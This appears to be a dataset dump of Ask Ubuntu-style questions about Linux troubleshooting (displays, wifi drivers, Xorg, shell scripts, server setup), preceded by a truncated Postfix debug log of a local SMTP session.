[ 16768 ] : prefork : child states : ii jan 29 03:21:51 example postfix/postfix-script [ 26285 ] : error : unknown command : 'quiet-reload' jan 29 03:21:51 example postfix/postfix-script [ 26286 ] : fatal : usage : postfix start ( or stop , reload , abort , flush , check , status , set-permissions , upgrade-configuration ) jan 29 03:22:02 example postfix/postfix-script [ 26298 ] : refreshing the postfix mail system jan 29 03:22:02 example postfix/master [ 2411 ] : reload -- version 2.11.0 , configuration /etc/postfix jan 29 03:22:20 example postfix/smtpd [ 26308 ] : name_mask : ipv4 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : inet_addr_local : configured 3 ipv4 addresses jan 29 03:22:20 example postfix/smtpd [ 26308 ] : process generation : 45 ( 45 ) jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : mynetworks ~ ? debug_peer_list jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : mynetworks ~ ? fast_flush_domains jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : mynetworks ~ ? mynetworks jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : relay_domains ~ ? debug_peer_list jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : relay_domains ~ ? fast_flush_domains jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : relay_domains ~ ? mynetworks jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : relay_domains ~ ? permit_mx_backup_networks jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : relay_domains ~ ? qmqpd_authorized_clients jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : relay_domains ~ ? relay_domains jan 29 03:22:20 example postfix/smtpd [ 26308 ] : connect to subsystem private/proxymap jan 29 03:22:20 example postfix/smtpd [ 26308 ] : send attr request = open jan 29 03:22:20 example postfix/smtpd [ 26308 ] : send attr table = pgsql : /etc/postfix/pgsql/relay_domains.cf jan 29 03:22:20 example postfix/smtpd [ 26308 ] : send attr flags = 0 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/proxymap socket : wanted attribute : status jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : status jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute value : 0 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/proxymap socket : wanted attribute : flags jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : flags jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute value : 16 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/proxymap socket : wanted attribute : ( list terminator ) jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : ( end ) jan 29 03:22:20 example postfix/smtpd [ 26308 ] : dict_proxy_open : connect to map=pgsql : /etc/postfix/pgsql/relay_domains.cf status=0 server_flags=fixed jan 29 03:22:20 example postfix/smtpd [ 26308 ] : dict_open : proxy : pgsql : /etc/postfix/pgsql/relay_domains.cf jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : permit_mx_backup_networks ~ ? debug_peer_list jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : permit_mx_backup_networks ~ ? fast_flush_domains jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : permit_mx_backup_networks ~ ? mynetworks jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : permit_mx_backup_networks ~ ? permit_mx_backup_networks jan 29 03:22:20 example postfix/smtpd [ 26308 ] : send attr request = open jan 29 03:22:20 example postfix/smtpd [ 26308 ] : send attr table = pgsql : /etc/postfix/pgsql/virtual_mailbox_map.cf jan 29 03:22:20 example postfix/smtpd [ 26308 ] : send attr flags = 0 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/proxymap socket : wanted attribute : status jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : status jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute value : 0 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/proxymap socket : wanted attribute : flags jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : flags jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute value : 16 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/proxymap socket : wanted attribute : ( list terminator ) jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : ( end ) jan 29 03:22:20 example postfix/smtpd [ 26308 ] : dict_proxy_open : connect to map=pgsql : /etc/postfix/pgsql/virtual_mailbox_map.cf status=0 server_flags=fixed jan 29 03:22:20 example postfix/smtpd [ 26308 ] : dict_open : proxy : pgsql : /etc/postfix/pgsql/virtual_mailbox_map.cf jan 29 03:22:20 example postfix/smtpd [ 26308 ] : send attr request = open jan 29 03:22:20 example postfix/smtpd [ 26308 ] : send attr table = pgsql : /etc/postfix/pgsql/virtual_alias_map.cf jan 29 03:22:20 example postfix/smtpd [ 26308 ] : send attr flags = 0 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/proxymap socket : wanted attribute : status jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : status jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute value : 0 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/proxymap socket : wanted attribute : flags jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : flags jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute value : 16 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/proxymap socket : wanted attribute : ( list terminator ) jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : ( end ) jan 29 03:22:20 example postfix/smtpd [ 26308 ] : dict_proxy_open : connect to map=pgsql : /etc/postfix/pgsql/virtual_alias_map.cf status=0 server_flags=fixed jan 29 03:22:20 example postfix/smtpd [ 26308 ] : dict_open : proxy : pgsql : /etc/postfix/pgsql/virtual_alias_map.cf jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : smtpd_access_maps ~ ? debug_peer_list jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : smtpd_access_maps ~ ? fast_flush_domains jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : smtpd_access_maps ~ ? mynetworks jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : smtpd_access_maps ~ ? permit_mx_backup_networks jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : smtpd_access_maps ~ ? qmqpd_authorized_clients jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : smtpd_access_maps ~ ? relay_domains jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : smtpd_access_maps ~ ? smtpd_access_maps jan 29 03:22:20 example postfix/smtpd [ 26308 ] : compiled against berkeley db : 5.1.25 ? jan 29 03:22:20 example postfix/smtpd [ 26308 ] : run-time linked against berkeley db : 5.1.25 ? jan 29 03:22:20 example postfix/smtpd [ 26308 ] : dict_open : hash : /etc/postfix/sasl/controlled_envelope_senders jan 29 03:22:20 example postfix/smtpd [ 26308 ] : unknown_helo_hostname_tempfail_action = defer_if_permit jan 29 03:22:20 example postfix/smtpd [ 26308 ] : unknown_address_tempfail_action = defer_if_permit jan 29 03:22:20 example postfix/smtpd [ 26308 ] : unverified_recipient_tempfail_action = defer_if_permit jan 29 03:22:20 example postfix/smtpd [ 26308 ] : unverified_sender_tempfail_action = defer_if_permit jan 29 03:22:20 example postfix/smtpd [ 26308 ] : name_mask : 1 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : auto_clnt_create : transport=local endpoint=private/tlsmgr jan 29 03:22:20 example postfix/smtpd [ 26308 ] : auto_clnt_open : connected to private/tlsmgr jan 29 03:22:20 example postfix/smtpd [ 26308 ] : send attr request = seed jan 29 03:22:20 example postfix/smtpd [ 26308 ] : send attr size = 32 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/tlsmgr : wanted attribute : status jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : status jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute value : 0 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/tlsmgr : wanted attribute : seed jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : seed jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute value : ty2ajifcnb7dqy7h5hzqaxzra1dzjtiv/wtyghppqcq= jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/tlsmgr : wanted attribute : ( list terminator ) jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : ( end ) jan 29 03:22:20 example postfix/smtpd [ 26308 ] : send attr request = policy jan 29 03:22:20 example postfix/smtpd [ 26308 ] : send attr cache_type = smtpd jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/tlsmgr : wanted attribute : status jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : status jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute value : 0 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/tlsmgr : wanted attribute : cachable jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : cachable jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute value : 0 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/tlsmgr : wanted attribute : timeout jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : timeout jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute value : 3600 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : private/tlsmgr : wanted attribute : ( list terminator ) jan 29 03:22:20 example postfix/smtpd [ 26308 ] : input attribute name : ( end ) jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : fast_flush_domains ~ ? debug_peer_list jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_string : fast_flush_domains ~ ? fast_flush_domains jan 29 03:22:20 example postfix/smtpd [ 26308 ] : auto_clnt_create : transport=local endpoint=private/anvil jan 29 03:22:20 example postfix/smtpd [ 26308 ] : connection established jan 29 03:22:20 example postfix/smtpd [ 26308 ] : master_notify : status 0 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : name_mask : resource jan 29 03:22:20 example postfix/smtpd [ 26308 ] : name_mask : software jan 29 03:22:20 example postfix/smtpd [ 26308 ] : connect from example.com [ 127.0.0.1 ] jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_list_match : example.com : no match jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_list_match : 127.0.0.1 : no match jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_list_match : example.com : no match jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_list_match : 127.0.0.1 : no match jan 29 03:22:20 example postfix/smtpd [ 26308 ] : smtp_stream_setup : maxtime=300 enable_deadline=0 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_hostname : example.com ~ ? 192.168.0.0/24 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_hostaddr : 127.0.0.1 ~ ? 192.168.0.0/24 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_hostname : example.com ~ ? 127.0.0.0/8 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : match_hostaddr : 127.0.0.1 ~ ? 127.0.0.0/8 jan 29 03:22:20 example postfix/smtpd [ 26308 ] : > example.com [ 127.0.0.1 ] : 220 example.com esmtp postfix jan 29 03:22:25 example postfix/smtpd [ 26308 ] : < example.com [ 127.0.0.1 ] : ehlo mwe jan 29 03:22:25 example postfix/smtpd [ 26308 ] : match_list_match : example.com : no match jan 29 03:22:25 example postfix/smtpd [ 26308 ] : match_list_match : 127.0.0.1 : no match jan 29 03:22:25 example postfix/smtpd [ 26308 ] : > example.com [ 127.0.0.1 ] : 250-example.com jan 29 03:22:25 example postfix/smtpd [ 26308 ] : > example.com [ 127.0.0.1 ] : 250-pipelining jan 29 03:22:25 example postfix/smtpd [ 26308 ] : > example.com [ 127.0.0.1 ] : 250-size 10240000 jan 29 03:22:25 example postfix/smtpd [ 26308 ] : > example.com [ 127.0.0.1 ] : 250-etrn jan 29 03:22:25 example postfix/smtpd [ 26308 ] : > example.com [ 127.0.0.1 ] : 250-starttls jan 29 03:22:25 example postfix/smtpd [ 26308 ] : > example.com [ 127.0.0.1 ] : 250-enhancedstatuscodes jan 29 03:22:25 example postfix/smtpd [ 26308 ] : > example.com [ 127.0.0.1 ] : 250-8bitmime jan 29 03:22:25 example postfix/smtpd [ 26308 ] : > example.com [ 127.0.0.1 ] : 250 dsn jan 29 03:22:31 example postfix/smtpd [ 26308 ] : < example.com [ 127.0.0.1 ] : quit jan 29 03:22:31 example postfix/smtpd [ 26308 ] : > example.com [ 127.0.0.1 ] : 221 2.0.0 bye jan 29 03:22:31 example postfix/smtpd [ 26308 ] : match_hostname : example.com ~ ? 192.168.0.0/24 jan 29 03:22:31 example postfix/smtpd [ 26308 ] : match_hostaddr : 127.0.0.1 ~ ? 192.168.0.0/24 jan 29 03:22:31 example postfix/smtpd [ 26308 ] : match_hostname : example.com ~ ? 127.0.0.0/8 jan 29 03:22:31 example postfix/smtpd [ 26308 ] : match_hostaddr : 127.0.0.1 ~ ? 127.0.0.0/8 jan 29 03:22:31 example postfix/smtpd [ 26308 ] : disconnect from example.com [ 127.0.0.1 ] jan 29 03:22:31 example postfix/smtpd [ 26308 ] : master_notify : status 1 jan 29 03:22:31 example postfix/smtpd [ 26308 ] : connection closed jan 29 03:22:31 example postfix/smtpd [ 26308 ] : proxymap stream disconnect jan 29 03:22:31 example postfix/smtpd [ 26308 ] : auto_clnt_close : disconnect private/tlsmgr stream jan 29 03:24:11 example postfix/smtpd [ 26308 ] : idle timeout -- exiting
411059	how to enable second monitor on boot ?	my laptop 's built-in monitor is broken , but that 's fine , i just an external hdmi one . within x , everything works ok. my harddrive is encrypted ( lvm+luks ) and i ca n't see the `` please enter your encryption prompt '' on boot because it 's just on my broken monitor and the hdmi one is still on standby . how can i enable my external monitor right on boot ?
411061	xorg high cpu when redrawing	for about the past week or so , xorg has been going crazy whenever the screen updates , for example scrolling a webpage , or just moving a window around . i can hear the fan turn up , and there is a huge spike in cpu ( usually 70-100 % ) . amd mobility legacy catalyst drivers ( only thing that works at all ) 2.53ghz intel core 2 duo 4gb ram
411062	ca n't add new live wallpaper to slidewall	i do n't seem to have the `` add '' option on my slidewall software for adding new live wallpapers . why is it happening ? i 'm using ubuntu 12.04 lts . please help !
411064	how can i get my asic miner to `` initialise '' on startup/login ?	based on the document from butterfly labs here : https : //forums.butterflylabs.com/showwiki.php ? title=tutorials : asic+mining+on+ubuntu+and+other+linux+distros i am using my asic miner successfully under ubuntu . however i want to start bfgminer on startup . this is where the fun starts . in order to get bgfminer to recognise the device i need to run sudo chmod 666 /dev/ttyusb* after that i can run bfgminer as follows : bfgminer -o miningpool : port -u username.workername -p workerpass when i try and put these commands in rc.local or in a script which i call via rc.local , bfgminer starts but it seems like the chmod function is n't working . bfgminer doesnt detect the device . the process is started by root . if i kill it from my user , and run the exact same script i am calling via rc.local , then it works . i 've also removed the password requirement from both root and my user in the sudoers file , so it isnt that . please help .
411065	ubuntu 13.10 wo n't work on virtual box for windows . only getting black screen . can anyone help ?	i 've just installed virtual box on my windows 7 ( if it helps ? ) then i downloaded ubuntu , when i finished installing it on the virtual machine- it show me that ubuntu had an internal error . then after i restarted it only shows me the login page then , after i insert my password it shows me black screen with nothing but mouse on it . really appriciate if anyone helps ! thank you : ) sorry for no picture of screen , not enough reputation . it 's mainly just a pitch black screen
411067	ethernet network disconnecting - atheros ar8152	i 'm new to ubuntu and i just brows the web and edit photo 's . i 'm running a ubuntu server for 1 year now and i love it . but now when i 'm just doing something the wifi icon look like it searching and then it connects but without a notification . but instead i get a disconnected error . here is a screen shot : here is some of the output of lspci -v : 01:00.0 ethernet controller : qualcomm atheros ar8152 v2.0 fast ethernet ( rev c1 ) subsystem : asustek computer inc. device 8468 flags : bus master , fast devsel , latency 0 , irq 46 memory at f7fc0000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at ec00 [ size=128 ] capabilities : < access denied > kernel driver in use : atl1c 02:00.0 network controller : qualcomm atheros ar9285 wireless network adapter ( pci-express ) ( rev 01 ) subsystem : azurewave aw-ne785 / aw-ne785h 802.11bgn wireless full or half-size mini pcie card flags : bus master , fast devsel , latency 0 , irq 17 memory at fbff0000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : ath9k
411068	creating and executing shell scripts to run xampp on double click	basic specs - ubuntu 13.10 , gnome 3 ( session fallback ) , ambiance theme , faenza icons . i recently installed xampp , now everytime i want to use the program i have to run the sudo /opt/lampp/lampp start command , im quite new at ubuntu but i know my way around some things and i knew i can make a shell script to start the program when i double click on it , so , i open nano in the terminal and write : # ! /bin/bash/ sudo /opt/lampp/lampp start i save it as `` lampp.sh '' at my home dir and give it the proper permissions chmod +x lampp.sh and chmod +775 lampp.sh . when i double click on it absolutely nothing happens , in order for it to work i have to open a terminal and run the the script there ./lampp.sh . if i have to open the terminal each time i want to run the script then the script it self is worthless ( specially when runing the sudo /opt/lampp/lampp start is 1 line of code ) , is there anyway i can run it on double click ? thanks in advance , i love this community .
411070	errors found when installing a sigproc4.3 on ubuntu	when i tried installing sigproc4.3 ( http : //sigproc.sourceforge.net/ ) , i found an error : /usr/bin/ld : can not find -lgcc_s i tried ; sudo /sbin/ldconfig -p | grep libgcc and that libgcc_s.so.1 ( libc6 , x86-64 ) = > /lib64/libgcc_s.so . libgcc_s.so.1 ( libc6 ) = > /lib/i386-linux-gnu/libgcc_s.so.1 ; then typed ; sudo ln -s /lib/i386-linux-gnu/libgcc_s.so.1 /usr/lib/gcc/i686-linux-gnu/4.6.3/libgcc_s.so.1 but i still got the same error message , /usr/bin/ld : can not find -lgcc_s please identify my problem and help me to install sigproc .
411071	ca n't copy mutliple files with krusader	when file copying on krusader am getting errno : 5 often the full size of file fails to copy and error is flagged up : ca n't copy ... - for example only 154mb out of true 265mb or again only 213 mb out of 1.4gb . the files in question are .wav this when doing a multiple copying operation of several .wav files . when i try to copy the offending files again - then they copy fine . i suspect memory - but without knowing the error codes am at a loss . copying from usb port to another usb port . krusader version 2.4.0-beta1 `` migration '' using kde development platform 4.8.5 ( 4.8.5 ) ubuntu 12.04 3.2.0-23-lowlatency ( # 31-ubuntu smp preempt wed apr 11 02:24:03 utc 2012 )
411072	attempting to install ath9k from compat-wireless broke networking and sudo ( ubuntu 13.10 macbook pro 4.1 )	i 'm having an issue with my system when i tried to install ath9k from the compat-wireless ( downloaded 3x i believe ) . i rebooted after it installed and i can not connect to wifi or ethernet , and sudo in terminal freezes as well . how can i fix this ?
411073	i want to install the ubuntu os not just the desktop	how will i then uninstall windows ? i do n't want to run both operating systems side by side .
411076	replacement ppa for ubuntu precise	today , when executing apt-get update after adding the r language repositories to apt , i received the following erros err http : //ppa.launchpad.net http/ppa/ubuntu/precise sources 404 not found err http : //ppa.launchpad.net http/ppa/ubuntu/main sources 404 not found err http : //ppa.launchpad.net http/ppa/ubuntu/precise i386 packages 404 not found err http : //ppa.launchpad.net http/ppa/ubuntu/main i386 packages 404 not found from the paths listed , they are from the ubuntu precise distribution , which is a lts version . to fix these errors , what are the replacement paths ? i found http : //ppa.launchpad.net/ubuntu-ppa/lxc-lts/ubuntu/dists/precise/ but would like to confirm that this is the replacement path for the packages .
411077	invalid signature error while booting windows 8	i am new to ubuntu and i have just installed ubuntu 13.10 so it works perfectly . but after i enter on windows 8 it shows this : error : invalid signature what should i do to get my windows back ?
411080	not able to connect to vmware ubuntu using putty in windows 7	i have installed vmware ubuntu in my windows 7 pc , with network settings as bridge connection . i got ip address in ubuntu as `` 192.168.1.3 '' and i am able to ping that ip from my windows host , but when i try to connect using the putty ssh or telnet connection , it fails . i have ssh installed in ubuntu . when my laptop is connected to my office network , the putty connection works fine , but when i 'm connected to my home network , it fails . is there any settings i 'm missing ?
411081	why wo n't ubuntu stay connected to the internet ?	ubuntu connects for a few seconds , sometime minutes , then it disconnects and does that over and over . what could be wrong ? keep in mind i hardly know anything about the os .
411085	adt bundle .bashrc $ path not working	i installed the adt bundle , worked fine the first go , even from a gnome custom launcher . did n't test adb or fastboot from cl , subsequently neither nor adt is working . echo `` $ path '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /opt/adt-bundle-linux/sdk/tools/ : /opt/adt-bundle-linux/sdk/platform-tools/ path is correct , /opt/adt-bundle-linux/sdk/ . not sure what i 've done wrong ? every guide i 've read has the same path to export . edit path appears to be working ; dave @ helios : /opt/adt-bundle-linux/sdk/platform-tools $ ls -l total 2140 -rwxr-xr-x 1 dave dave 1231255 jan 26 08:00 adb drwxr-xr-x 2 dave dave 4096 jan 26 08:00 api -rwxr-xr-x 1 dave dave 197736 jan 26 08:00 fastboot -rw-r -- r -- 1 dave dave 727806 jan 26 08:00 notice.txt -rw-r -- r -- 1 dave dave 16648 jan 26 08:00 source.properties drwxr-xr-x 2 dave dave 4096 jan 26 08:00 systrace dave @ helios : /opt/adt-bundle-linux/sdk/platform-tools $ adb bash : /opt/adt-bundle-linux/sdk/platform-tools/adb : no such file or directory dave @ helios : /opt/adt-bundle-linux/sdk/platform-tools $
411093	installing ubuntu along side of windows 8.1 on sony vaio	i looked and did n't find help on my present laptop . trying to dual boot on laptop , here are my stats : sony vaio : svf15a18cxb os : windows 8.1 processor : i7-3537u cpu @ 2 ghz ram : 12 gb system : 64-bit pen and touch : full windows touch support w/ 10 touch points graphics : nvidia geforce gt 735m i copied ubuntu onto a cd and tried installing it . my computer looked at me like i was crazy . i manually partitioned off 20gb to run the program . just not sure what i 'm doing wrong with this project . i do n't want to use a vm as i would really like to learn linux .
411096	dell xps m1530 overheating problem	i have a dell xps m1530 running ubuntu 13.10 and began noticing the keyboard surface get hot . it seemed odd to me that the fan runs intermittently at lower temperatures . i 've already checked the wiring and heat sink paste inside the machine , after which , the cpu and gpu were both at 200f . occasionally , my computer will shut down due to overheating . is there any way to solve this issue without buying a new machine altogether ?
411101	avconv loop issue with output file names	how can i turn : /media/mediaone/movies/kids/aladdin.avi /media/mediaone/movies/kids/incredibles.avi into /media/mediaone/converted/aladdin.mp4 /media/mediaone/converted/incredibles.mp4 when looping a directory using avconv ? right now , they are outputted as : /media/mediaone/movies/kids/aladdin.avi.mp4 /media/mediaone/movies/kids/incredibles.avi.mp4 and here is what i am trying : for i in /media/mediaone/movies/kids/*.avi ; do avconv -i `` $ i '' -c copy `` $ i.mp4 '' ; done tried this too : for i in /media/mediaone/movies/kids/*.avi ; do avconv -i `` $ i '' -c copy `` /media/mediaone/converted/ $ i.mp4 '' ; done but got a bunch of errors , because $ i/media/mediaone/converted/ did not exist
411103	broadcom wireless driver does n't see all the ap	i have 2 notebook that see all the wireless access point except one . the computers are : hp pavilion dv6 - wifi broadcom bcm4312 - kubuntu 13.10 64bit asus eeepc 1018p - wifi broadcom bmc4313 - kubuntu 14.04 64 bit aplha 2 the missing access point is a d-link dir-615 set up with : mixed mode `` mixed 802.11n , 802.11g and 802.11b '' auto channel scan enabled wireless channel ch13 ( not changeable ) i have another ap and this one ( a tp-link ) is correctly identified and used for connections . all other devices i have in home ( some android smartphones and tablets , an ipad and a playstation ) correctly see and use the missing ap also the computers connets to this ap if booted with windows . i do n't know in which kubuntu version or update the problem arose , but i tried on the asus a fresh install of 12.04.3 , 12.10 , 13.04 , 13.10 , 14.04alpha2 and obtained the same result : the driver in use is wl . nm-tool on hp says device : eth1 [ efm2 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : wl state : connected default : yes hw address : f0:7b : cb:95:14:08 capabilities : speed : 54 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) telecom-64869841 : infra , a4 : b1 : e9 : d3 : b6 : d1 , freq 2437 mhz , rate 54 mb/s , strength 10 wpa wpa2 box : infra , a0 : f3 : c1:98:58:80 , freq 2447 mhz , rate 54 mb/s , strength 17 wpa2 fastweb-1-c85nyzcts6gd : infra , e0:91:53:4e:4c:58 , freq 2437 mhz , rate 54 mb/s , strength 12 wpa *efm2 : infra , f8:1a:67:30 : a0:08 , freq 2412 mhz , rate 54 mb/s , strength 66 wpa > wpa2 ipv4 settings : address : 192.168.253.100 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.253.1 dns : 192.168.253.1 my ap are efm2 ( listed ) and efm ( missing ) ; all other ap are from neighbors followed the instructions in the first response . i still see only the far ap and do n't see the nearest dir-615 ap . nm-tool says : - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : b43 state : disconnected default : no hw address : f0:7b : cb:95:14:08 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points efm2 : infra , f8:1a:67:30 : a0:08 , freq 2412 mhz , rate 54 mb/s , strength 46 wpa > wpa2 what else can i try ? as in the comments , the iwlist command is mirto @ msb03 : /etc/network $ sudo iwlist eth1 freq eth1 26 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz channel 14 : 2.484 ghz channel 36 : 5.18 ghz channel 38 : 5.19 ghz channel 40 : 5.2 ghz channel 42 : 5.21 ghz channel 44 : 5.22 ghz channel 46 : 5.23 ghz channel 48 : 5.24 ghz channel 149 : 5.745 ghz channel 153 : 5.765 ghz channel 157 : 5.785 ghz channel 161 : 5.805 ghz channel 165 : 5.825 ghz at this point , i returned to the wl driver because i see no difference in behaviour following bug [ wireless-tools ] can not use channel 12 or 13 of wifi in a region where it is legal i tried mirto @ msb03 : /etc/network $ sudo cat /sys/module/cfg80211/parameters/ieee80211_regdom 00 that says 00 instead of us or eu after googling bugs i found that there exist an /etc/defeult/crda file with an empty domain asap i 'll try to set the domain sudo cat /etc/default/crda set regdomain to a iso/iec 3166-1 alpha2 country code so that iw ( 8 ) may set the initial regulatory domain setting for ieee 802.11 devices which operate on this system . governments assert the right to regulate usage of radio spectrum within their respective territories so make sure you select a iso/iec 3166-1 alpha2 country code suitable for your location or you may infringe on local legislature . see `/usr/share/zoneinfo/zone.tab ' for a table of timezone descriptions containing iso/iec 3166-1 alpha2 country codes . regdomain= so i tried regdomain=it but nothing changed after setting it in domain . i have : $ sudo iw reg get country it : ( 2402 - 2482 @ 40 ) , ( n/a , 20 ) ( 5170 - 5250 @ 40 ) , ( n/a , 20 ) ( 5250 - 5330 @ 40 ) , ( n/a , 20 ) , dfs ( 5490 - 5710 @ 40 ) , ( n/a , 27 ) , dfs ( 57240 - 65880 @ 2160 ) , ( n/a , 40 ) , no-outdoor i tried on another computer to scan the missing ap : abandoned again the wl driver for the b43 driver rebooted added the it domain in /etc/default/crda now seems to work . i 'll try the same operation on the asus that have a fresh install _________ solved on asus ___________________________ operations to solve the problem on asus kubuntu 14.04alpha2 sudo apt-get remove -- purge bcmwl-kernel-source sudo apt-get install linux-firmware-nonfree reboot reboot add it as domain in /etc/default/crda regdomain=it reboot reboot ______ last update _________________________ the drivers selected are : on hp driver b43 on asus driver brcmsmac
411106	key repeat functionality does n't work on certain keys ( ubuntu 12.04 )	i 'm running ubuntu 12.04 on a macbook pro and key repeat ( when i hold down a key ) is not working for any of the brightness buttons ( keyboard backlight and screen brightness ) . is there any way to force these keys to repeat when held ?
411108	how to write characters to serial port	i have an ancient serial spectrometer which only runs on win9x . i want to convert to a linux system , but the existing software is proprietary and wont work . i was able to access a console internally on the spectrometer . the console takes keyboard character commands , and sends the output to the serial port . in vb6 i can write to the com port with char values http : //www.gtwiki.org/mwiki/ ? title=vb_chr_values using comport.write ( chr ( 34 ) ) i am interested in using qt for the interface , how can i send something to the same effect as comport.write ( chr ( 34 ) ) using qt ?
411109	ubuntu 12.04.3 lts process checking	how would i get the process id of a java process or know if the screen for the process of a minecraft server is on ? just needing to get some help with this
411110	how to customize ubuntu with extra ubiquity options for the user ?	i 'm working on a ubuntu based distro with some custom packages , i want to insert a step in which i give the user ability to select the desktop environment and packages he wants to install . i know the installer is ubiquity ( derivative od d-i ) but from where can i add the steps ?
411114	ubuntu not working properly	i installed ubuntu and it is n't working properly . i have tried everything to fix the issues such as not playing dvds or running windows software through playonlinux . i tried to reinstall windows from a windows disk and it keeps giving me an error that i do n't have enough space on my hard drive to install . i have tried booting from the disk as well with no success . i really just want to reinstall windows so i can have piece of mind that my laptop will run properly . if anyone out there can help me it would be much appreciated .
411117	how do i make a dchp server ?	i want to finish making a minecraft server ( tcp/udp ) i already have a system that uses a private ip of 192.168.0.9 and a dns on it that uses the public ip of 2.220.217.108 , then redirects to it from helloworld.dyndns.org with ddclient but when i start the server it lets me connect on minecraft through the internal ip but not the public ip or the hostname ? the server uses port 25565 but i always get connection refused if i attempt to connect with the hostname or public ip ? i can connect to the server in my web browser but although the config is correct ( as far as i know ) i ca n't connect to it on minecraft , also even when i connect from the public ip it does n't say if anyone attempted to connect to the server and was refused . was this because the connection did n't get past the public ip or hostname firewall ? maybe it 's because my config in /etc/network/interfaces is n't right ? i am not able to use a static ip address in the config because my isp does n't offer it /etc/network/interfaces : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp post-up iptables-restore < /etc/iptables.up.rules
